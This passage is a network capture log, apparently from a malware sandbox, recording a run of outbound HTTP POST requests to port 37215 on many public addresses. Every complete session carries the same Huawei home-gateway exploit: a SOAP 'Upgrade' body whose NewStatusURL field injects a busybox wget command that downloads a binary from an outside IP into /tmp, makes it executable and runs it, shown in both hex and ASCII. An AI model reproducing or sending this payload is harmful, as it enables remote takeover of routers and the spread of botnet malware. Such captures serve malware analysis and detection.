                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              271192.168.2.1532926121.106.222.4737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206131935 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              272192.168.2.1545556181.180.202.17237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206176996 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              273192.168.2.1557386222.96.112.13437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206206083 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              274192.168.2.1547228181.139.73.15037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206206083 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              275192.168.2.154571894.133.31.6337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206214905 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              276192.168.2.1557240156.151.48.15737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206234932 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              277192.168.2.153506237.238.202.18537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206279993 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              278192.168.2.1532872222.30.33.23337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206279993 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              279192.168.2.154227494.231.165.5537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206288099 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              280192.168.2.1547884105.66.95.6937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206296921 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              281192.168.2.1557804181.81.21.20137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206306934 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
